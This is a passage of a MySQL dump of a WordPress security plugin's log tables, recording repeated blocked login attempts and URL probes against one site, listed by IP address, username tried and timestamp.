t.org.uk/wp-login.php'),('59.96.136.177',996182193,'admin',0,1629878944.2140,7,'ULqdAzle8gCtoHK9ID0VjpT2','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'admin',0,1629879004.7491,7,'faJ9hzqOZxT4pm8uHb35D6Bk','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'admin',0,1629879065.3702,7,'MUZBsfvREbSD2AgoLlim4e6c','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'admin',0,1629879126.2980,7,'VUrbXwStg1zAJZd0Nj37hyLD','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'admin',0,1629879187.3634,7,'h7z2XoCF9eDd81JSmYMgxAHp','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629879187.5401,10,'h7z2XoCF9eDd81JSmYMgxAHp','','701|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629879248.2654,50,'Y7itoNzVHnQy0vTb5kefl68h','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629879309.8066,50,'gV73B2cQUPwWbjdYnrGx8D4v','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629879370.6641,50,'wJ17LhTQOq3EY5NdUG2HpZu6','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629879431.3035,50,'FIqYsB9TwQRLdl4pV7GiagWr','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629879492.2981,50,'AZ1OKvzLmfhpwtHydjBD54aU','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629879553.2829,50,'MWLNhKPrAtCZEcwasxD40VvS','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629879615.1107,50,'8zEJb3Gsp0aKikHonNjtDVUu','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629879675.5615,50,'ZsgaA0v8SyzMGYTKJNBdDiut','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629879736.8408,50,'8ieCMjsJOSwm7dLqWlIvNnEY','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629879797.2575,50,'FrjQpv6XHLBzdCuJWD1MN3Ug','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629879858.4058,50,'btPecsTMdXm3QKzp6uWBv5DO','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629879920.0587,50,'SjgWaIfdJ5EFVUq4oQ9nmC6R','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629879980.3013,50,'RJSzwgfIKQvi8ay1p53PmTFC','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629880041.3575,50,'sWCr9dw5tYmXgFGknhZjKqzV','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629880102.2193,50,'AFclIbB7Ev4ZgtPWr2RG9sjk','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('173.208.244.93',2916152413,'westonspirit',0,1629880148.5294,51,'IkYxWpM4UJPaX2nby3Dmwcsg','','0|0|0|0|www.westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629880163.2880,50,'vQtmyxpfD7hjkGeZo9J6SCKX','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629880225.6043,50,'LJsWd5FrH1wGtjRT6mkzCvIV','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629880285.3330,50,'lS52dGhuNjZqkTsOB8EJmoPQ','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629880346.4113,50,'8ljhr6AGT5BHpw1bezRmtcYM','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629880407.2280,50,'oyZ4tDRKk0pLXEf8U3wMcrHG','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629880468.4080,50,'c9YkWVABxlmIbLCzDQFUgMaO','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629880529.8788,50,'2xUQ5my07pLiCfs1ISwAv8qT','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629880590.3607,50,'wsI5BfRjTmKDNC24GqcQ7Jzr','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('107.150.63.170',1805008810,'westonspirit',0,1629880648.5163,51,'86ibnTjkVdEUKoPXxCzrR0qN','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629880651.3133,50,'5AvRoJCuU8fyPk1BXa9dg2nh','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629880712.2379,50,'8Wj1bXZqFiKBaGnuTNSvrtlU','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('63.141.251.236',1066269676,'org',0,1629880759.6425,51,'dZ6YX83ErkR9KOUbPAlCM52m','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('59.96.136.177',996182193,'',0,1629880773.4071,50,'TR4VnfOZ38SHi27WQeLj0c6s','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'admin',0,1629880834.9058,7,'fSchv5H3TxCgqiAWeBt4EmYn','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'admin',0,1629880895.2902,7,'3LqYau65FtVsMjObCNcEvJBS','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('192.151.144.59',3231158331,'admin',0,1629880936.0946,7,'fWkS1z7x5YGmIM2bLltoEHnF','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'admin',0,1629880956.3438,7,'S3u47dscw8inhC5PEHAJgX26','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'admin',0,1629881017.3466,7,'gndNFt6O1y7AaJl3iS0zwVRr','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'admin',0,1629881078.4394,7,'HaVTXc1Cq4fWKZzIwBg9FS5x','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629881078.4614,10,'HaVTXc1Cq4fWKZzIwBg9FS5x','','701|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629881139.8943,50,'DLkKTQuVWeS3vq2othAENHUF','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629881201.2917,50,'gRG0uMvndLBft9A7o18YEU2s','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('107.150.63.170',1805008810,'uk',0,1629881209.5394,51,'TFQG4YiALmUwcHoECq5aeNRj','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629881262.4447,50,'bVWD5qvcKULdsBEtpf3i90hx','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629881322.4920,50,'EzrcuOkW1aqLvomIBjbtwQl5','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629881383.5708,50,'368YAz9bPRLEKQurJFIyxeS0','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629881445.1132,50,'936itqcMOxo1ZKahQmsWUjf2','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629881505.4835,50,'OUgjqntVX2sflIK9HJ6Eu4pT','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629881568.3023,50,'3hq7FvaxNWjDukcepOVCniBo','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629881627.7869,50,'rOqA7vQZ6TtdCpU8ESwhDxPc','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629881688.2493,50,'uOvDz3UfX91boSYc4ACWmptd','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629881750.8206,50,'nd6MKXQH1woiFGk9sSuPNqJE','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629881810.2216,50,'ZWSUuGfOg0JnvRQTKkEmeBF6','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629881871.2322,50,'fKHLmqVtaj9Z3XS8xps42bg7','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629881932.3240,50,'hdKjveM4VazFwWDpr3YN9ZCk','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629881993.7554,50,'zTLNBY3eOm0avGVH8hk6btDs','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629882055.0331,50,'YyvNBJzg9GQS6T308rZMbxsn','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629882116.1314,50,'Vj6wPmtMo0hUI2usDeAZRiap','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629882176.6714,50,'nTKUSxudCHABX49l3IvMO1Dt','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629882237.2465,50,'i96hjPR5cv0xZMEmJ3FaKrpf','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629882298.8444,50,'8AzD134lpSXOHjcKmvsguiNo','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629882360.1856,50,'8M0ka3id4sYHLRbGNcUFxE75','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629882420.2902,50,'mfsn8CwEb1H5KXkP0VZoU3jp','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629882481.6399,50,'xjUhYZITRv7NmFWJ8oiwQgSb','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629882542.4668,50,'K9egsx4CVI6F8Wamw2HbviR5','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629882603.3367,50,'XBR0NFuHxJcOySKA14alq2GW','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629882665.2918,50,'UKfQMOys7LYhv1pRmaNz265S','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('23.88.47.166',391655334,'',0,1629882685.3381,55,'rJXa1uteoqBjghGwQl82f4Sy','','19|0|0|0|www.westonspirit.org.uk/wordpress/wp-admin/setup-config.php'),('117.203.118.201',1976268489,'',0,1629882725.8952,50,'kMbeK3wNV89dscvRzrEI4DmW','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629882786.4675,50,'dci8HQlfgwFpBOWo3j69arb1','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('5.188.62.76',96222796,'westonspirit',0,1629882822.9699,51,'0xkCtw5DL6BEvyOGM1lJHrUT','','0|0|0|0|www.westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629882848.0006,50,'wD0SfPB8ZmgnvXzMORANo7cy','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629882908.2916,50,'otAxa9CNdWu2LqTG0YwJh6DK','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629882969.9156,50,'niRMHXcxd9y51SPm3ECYQfBK','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629883030.2706,50,'AZgeHRTlwrUtVPO2khLmJsnS','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629883030.8227,50,'LS1lFi4HWr08ohub2k9RPqzj','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629883091.5170,50,'zaDpWCkuINQ43FU7L1eTiyht','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629883152.8101,50,'g2qkYF4yAu3PRNaQBrGs8wxW','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629883213.4443,50,'7M9mn2ahLXtyTPGpjoOD8JS0','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629883274.9847,50,'r2FEDfwkispR5hNqAQOaYTKd','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629883335.3645,50,'EpeRwvaot6mynLiVM5cQWDZJ','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629883396.2815,50,'X6NeTJ4nFgEOxtcu0lCVadmG','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629883457.6493,50,'3LSGqihxaH6rAWE7uZYb4RP9','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629883518.2557,50,'MN0lZ9FbjkHwEydpvxKXnaBf','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629883581.0871,50,'pT6jWdh5PUkxiwGKbLsRaZ4e','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629883640.6233,50,'Wbg27D9Uls3XHdfJFVipABw0','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629883640.6234,50,'dNb30xp7rXDVCJImchE9U4ZR','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629883701.6850,50,'7L3rEJtH8Rle15Wq4MPDbQy0','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('185.191.171.4',3116346116,'',0,1629883742.0594,55,'KoHf59F1dB3OjgS0EqNVDIyQ','','19|0|0|0|www.westonspirit.org.uk/money-talks.asp'),('117.203.118.201',1976268489,'',0,1629883762.4426,50,'bnjKLZzdQxTRFJa2yC5A6WYM','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629883823.5122,50,'NF63UjzGB2gVRpHycDQTYfvX','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629883884.7530,50,'No4DS6x7sPIYlCqh1FGgW2dQ','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629883945.2464,50,'ZVvU6KijSsW2n7Twx5lyebPr','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629884006.2163,50,'wzD4o72aVcFCni83mOZEItLU','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629884067.2263,50,'wuxJQemM6l9SPkjh1WKd5nA4','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629884128.7324,50,'ZxaV6BHEYfkTmNlcD1QKpF4X','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629884189.9737,50,'8tKemCkWoa4TPwQOgz0y3vrY','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629884190.7327,50,'N1qwoY9C7T8QFcvRPegAJEtL','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629884250.2890,50,'L9FAhO6rge3HDt0IqN8MuxQd','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629884311.9293,50,'tQcU1ywHkdCpOmA8JvS0fLnI','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629884375.3000,50,'ueRZ3Xl0GkSKNLoA9dqy8b64','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629884433.3526,50,'C4nWkIduD0YNqmSpxhMAE83e','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629884494.9873,50,'W5rAYZwNzIPSvXy6BmJpej4n','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629884496.5072,50,'0PDiuWSmK2j6t3RYQvXoCIks','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629884557.4761,50,'JMtFa3NK6e1YXDmWrzUOjRs2','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('117.203.118.201',1976268489,'',0,1629884616.3722,50,'OPGvnHc40aYjVQoUkJwKZ1Mt','','13|0|0|0|westonspirit.org.uk/wp-login.php'),('142.54.188.74',2385951818,'westonspirit',0,1629884991.7210,51,'5d1FjpltQgIvYO0bezZ2nfa4','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('173.208.244.93',2916152413,'uk',0,1629885061.7927,51,'gelstHWnPZrU9pT405hXdLF1','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('192.151.145.141',3231158669,'org',0,1629885085.8441,51,'VvjKJ09lwd32tureokNcmP6z','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('142.54.181.60',2385950012,'admin',0,1629885192.8180,7,'LHrlmnst1Nqwyp45AOCif2uB','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('173.208.244.93',2916152413,'org',0,1629889090.6094,51,'bIq9KPigQnOAL1DazX6MuChJ','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('198.204.225.194',3335315906,'westonspirit',0,1629889349.4716,51,'CPOISMlvJ4qFHUbLYsafe76n','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('69.30.225.100',1159651684,'uk',0,1629889569.9808,51,'IFcfDU4Q1TwCZWepEAvH8Rgt','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('208.110.85.68',3496891716,'admin',0,1629889698.2998,7,'m74jqtfGduRJPL8c9x0DBg5O','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('69.30.225.100',1159651684,'westonspirit',0,1629889977.7033,51,'gOAL3oxcKyD8fFbQG6tuzn7B','','0|0|0|0|www.westonspirit.org.uk/wp-login.php'),('107.150.59.246',1805007862,'admin',0,1629892643.5274,7,'Wio8Hpv6X5KTxwGPMIBZYzl9','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('69.30.225.100',1159651684,'org',0,1629892888.7461,51,'VLaOihQIfp93CJwAPDlyW1eS','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('5.188.62.76',96222796,'westonspirit',0,1629892930.0613,51,'ZTR7dEy9MOcHp4WeL5g2m0jv','','0|0|0|0|www.westonspirit.org.uk/wp-login.php'),('192.151.144.59',3231158331,'westonspirit',0,1629893044.9919,51,'K60qUBJTw5dF3YNhaC4bDPW7','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('107.150.59.246',1805007862,'uk',0,1629893121.3460,51,'vjtG1i6Peudy4mLaUVJINSEZ','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('69.30.225.100',1159651684,'admin',0,1629896704.7408,7,'fYx2qCc1Fi0QpA7BsZ9Rrtkw','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('142.54.181.60',2385950012,'westonspirit',0,1629896795.6483,51,'eiMtSs4fHXhJrZUE1maKjwFO','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('69.30.225.100',1159651684,'org',0,1629896886.3454,51,'eUguqNfExVXb4YC3l1czHDdZ','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('198.204.225.194',3335315906,'uk',0,1629897154.3937,51,'SbaTtz2wMPFgCeN8uB7yIKoi','','0|0|0|0|westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'nothinghappenign',0,1629897181.2065,51,'LJmgvfbQYcTU6hX4w0WPAuk2','','0|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'westonspirit',0,1629897254.6571,51,'UQHFNL90EWh2DToScAyqVl8K','','0|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'nothinghappenign',0,1629897267.2443,7,'TSOEscNuhBq3W9Af4r0Uekjz','','0|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'nothinghappenign',0,1629897283.1609,7,'h2ycT46kmD3s0aRU7WO9PgHM','','0|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'nothinghappenign',0,1629897303.7516,7,'LocixnDrPjT2d5U8qStsE9lu','','0|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'',0,1629897303.7837,10,'LocixnDrPjT2d5U8qStsE9lu','','701|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'',0,1629897305.9384,50,'ErLkojMxW9OdTQcRZK20ebSh','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'',0,1629897319.4665,50,'yRzUZjtfJL0adPBHSrcl7Qqu','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'',0,1629897320.3084,50,'y6x2kspl7jMvQJfYdmKWwerb','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'',0,1629897320.9496,50,'uVEpgorXHshY2LmtzFODU06Q','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'',0,1629897321.2664,50,'thb5u47EnZ3HRG9feaC6wrc2','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'nothinghappenign',0,1629899045.7444,53,'bo5kmuDPqjUWr6E0GhYtyw3O','','13|0|0|0|www.westonspirit.org.uk/favicon.ico'),('185.175.113.72',3115282760,'',0,1629899047.6974,50,'P5H2tr70WX3uCJxsmcNfVkLM','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'nothinghappenign',0,1629899047.7125,53,'P5H2tr70WX3uCJxsmcNfVkLM','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'',0,1629899050.3925,50,'kHbh8VxdQmAYFIL1JMTWgtai','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'nothinghappenign',0,1629899050.4143,53,'kHbh8VxdQmAYFIL1JMTWgtai','','13|0|0|0|www.westonspirit.org.uk/wp-login.php'),('185.175.113.72',3115282760,'nothinghappenign',0,1629899051.1584,53,'syiF5VUI19qfZ7eKL6HRnPjT','','13|0|0|0|www.westonspirit.org.uk/favicon.ico'),('66.249.64.126',1123631230,'',0,1629899054.0234,55,'LjJ9Ka1vXQREe0WOd4tqDYVA','','19|0|0|0|www.westonspirit.org.uk/hex/video-uk-Blackp-v-Sunder-falu-tv02.html/wp-admin/setup-config.php'),('66.249.64.98',1123631202,'',0,1629899056.4857,55,'BgQupNRfM9l8xeJ5d31UazwO','','19|0|0|0|www.westonspirit.org.uk/hex/video-uk-Fulha-v-Birming-falu-tv01.html/wp-admin/setup-config.php'),('66.249.64.98',1123631202,'',0,1629899057.5216,55,'p4QCJZBtFWTzXx6icPs7eanf','','19|0|0|0|www.westonspirit.org.uk/hex/video-uk-Cardiff-v-Brighton-falu-tv01.html/wp-admin/setup-config.php'),('185.175.113.72',3115282760,'nothinghappenign',0,1629899100.7461,53,'pt3G9an7lCLYukBTIA0JWFy2','','13|0|0|0|www.westonspirit.org.uk/favicon.ico'),('185.175.113.72',3115282760,'nothinghappenign',0,1629899152.5894,53,'YifFeqWBVcQN8C1In6thglpv','','13|0|0|0|www.westonspirit.org.uk/blogs/the-key-things-to-know-about-drug-detoxing'),('185.175.113.72',3115282760,'nothinghappenign',0,1629899153.5642,53,'vB9iwnZ1hNjSQHIRVa7zp85D','','13|0|0|0|www.westonspirit.org.uk/favicon.ico');
/*!40000 ALTER TABLE `cerber_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_qmem`
--

DROP TABLE IF EXISTS `cerber_qmem`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_qmem` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `http_code` int(10) unsigned NOT NULL,
  `stamp` int(10) unsigned NOT NULL,
  KEY `ip_stamp` (`ip`,`stamp`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_qmem`
--

LOCK TABLES `cerber_qmem` WRITE;
/*!40000 ALTER TABLE `cerber_qmem` DISABLE KEYS */;
INSERT INTO `cerber_qmem` VALUES ('181.143.205.4',404,1629855633),('181.143.205.4',404,1629855634),('181.143.205.4',404,1629855695),('181.143.205.4',404,1629855696),('181.143.205.4',404,1629855757),('181.143.205.4',404,1629855758),('181.143.205.4',404,1629855818),('181.143.205.4',404,1629855818),('181.143.205.4',404,1629855879),('181.143.205.4',404,1629855879),('181.143.205.4',404,1629855942),('181.143.205.4',404,1629855943),('181.143.205.4',404,1629856003),('181.143.205.4',404,1629856004),('181.143.205.4',404,1629856064),('181.143.205.4',404,1629856064),('181.143.205.4',404,1629856126),('181.143.205.4',404,1629856127),('181.143.205.4',404,1629856188),('181.143.205.4',404,1629856188),('181.143.205.4',404,1629856250),('181.143.205.4',404,1629856250),('181.143.205.4',404,1629856310),('181.143.205.4',404,1629856310),('181.143.205.4',404,1629856372),('181.143.205.4',404,1629856372),('181.143.205.4',404,1629856434),('181.143.205.4',404,1629856434),('181.143.205.4',404,1629856495),('181.143.205.4',404,1629856495),('181.143.205.4',404,1629856556),('181.143.205.4',404,1629856556),('181.143.205.4',404,1629856618),('181.143.205.4',404,1629856618),('181.143.205.4',404,1629856679),('181.143.205.4',404,1629856679),('181.143.205.4',404,1629856740),('181.143.205.4',404,1629856741),('181.143.205.4',404,1629856801),('181.143.205.4',404,1629856801),('181.143.205.4',404,1629856862),('181.143.205.4',404,1629856862),('181.143.205.4',404,1629856923),('181.143.205.4',404,1629856924),('181.143.205.4',404,1629856984),('181.143.205.4',404,1629856984),('181.143.205.4',404,1629857045),('181.143.205.4',404,1629857045),('181.143.205.4',404,1629857106),('181.143.205.4',404,1629857106),('181.143.205.4',404,1629857167),('181.143.205.4',404,1629857167),('181.143.205.4',404,1629857228),('181.143.205.4',404,1629857228),('181.143.205.4',404,1629857290),('181.143.205.4',404,1629857290),('181.143.205.4',404,1629857350),('181.143.205.4',404,1629857350),('181.143.205.4',404,1629857411),('181.143.205.4',404,1629857412),('181.143.205.4',404,1629857472),('181.143.205.4',404,1629857473),('181.143.205.4',404,1629857533),('181.143.205.4',404,1629857534),('181.143.205.4',404,1629857594),('181.143.205.4',404,1629857594),('59.96.136.177',404,1629871683),('59.96.136.177',404,1629871744),('59.96.136.177',404,1629871805),('59.96.136.177',404,1629871866),('59.96.136.177',404,1629871927),('59.96.136.177',404,1629871988),('59.96.136.177',404,1629872049),('59.96.136.177',404,1629872110),('59.96.136.177',404,1629872171),('59.96.136.177',404,1629872232),('59.96.136.177',404,1629872293),('59.96.136.177',404,1629872354),('59.96.136.177',404,1629872415),('59.96.136.177',404,1629872476),('59.96.136.177',404,1629872537),('59.96.136.177',404,1629872599),('59.96.136.177',404,1629872659),('59.96.136.177',404,1629872720),('59.96.136.177',404,1629872781),('59.96.136.177',404,1629872842),('59.96.136.177',404,1629872903),('59.96.136.177',404,1629872964),('59.96.136.177',404,1629873025),('59.96.136.177',404,1629873086),('59.96.136.177',404,1629873147),('59.96.136.177',404,1629873208),('59.96.136.177',404,1629873269),('59.96.136.177',404,1629873330),('59.96.136.177',404,1629873391),('59.96.136.177',404,1629873452),('59.96.136.177',404,1629873513),('59.96.136.177',404,1629873574),('59.96.136.177',404,1629873635),('59.96.136.177',404,1629873696),('59.96.136.177',404,1629873757),('59.96.136.177',404,1629873757),('59.96.136.177',404,1629873818),('59.96.136.177',404,1629873879),('59.96.136.177',404,1629873940),('59.96.136.177',404,1629874002),('59.96.136.177',404,1629874064),('59.96.136.177',404,1629874124),('59.96.136.177',404,1629874185),('59.96.136.177',404,1629874246),('59.96.136.177',404,1629874307),('59.96.136.177',404,1629874368),('59.96.136.177',404,1629874430),('59.96.136.177',404,1629874490),('59.96.136.177',404,1629874551),('59.96.136.177',404,1629874612),('59.96.136.177',404,1629874673),('59.96.136.177',404,1629874735),('59.96.136.177',404,1629874795),('59.96.136.177',404,1629874856),('59.96.136.177',404,1629874917),('59.96.136.177',404,1629874978),('59.96.136.177',404,1629875040),('59.96.136.177',404,1629875100),('59.96.136.177',404,1629875161),('59.96.136.177',404,1629875222),('59.96.136.177',404,1629875344),('59.96.136.177',404,1629875405),('59.96.136.177',404,1629875466),('59.96.136.177',404,1629875527),('59.96.136.177',404,1629875588),('59.96.136.177',404,1629875649),('59.96.136.177',404,1629875710),('59.96.136.177',404,1629875771),('59.96.136.